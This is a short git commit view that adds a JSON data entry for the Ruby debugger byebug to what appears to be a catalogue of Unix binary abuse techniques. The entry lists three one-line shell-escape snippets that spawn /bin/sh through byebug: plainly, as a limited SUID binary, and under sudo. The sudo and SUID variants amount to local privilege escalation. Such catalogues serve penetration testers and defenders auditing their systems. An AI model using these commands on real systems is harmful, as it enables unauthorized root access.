add data source for byebug

master
t0thkr1s 4 years ago
parent 3ed62466f3
commit d707d81a99

@ -0,0 +1,19 @@
{
"functions": {
"shell": [
{
"code": "TF=$(mktemp)\necho 'system(\"/bin/sh\")' > $TF\nbyebug $TF\ncontinue\n"
}
],
"limited-suid": [
{
"code": "TF=$(mktemp)\necho 'system(\"/bin/sh\")' > $TF\n./byebug $TF\ncontinue\n"
}
],
"sudo": [
{
"code": "TF=$(mktemp)\necho 'system(\"/bin/sh\")' > $TF\nsudo byebug $TF\ncontinue\n"
}
]
}
}
Loading…
Cancel
Save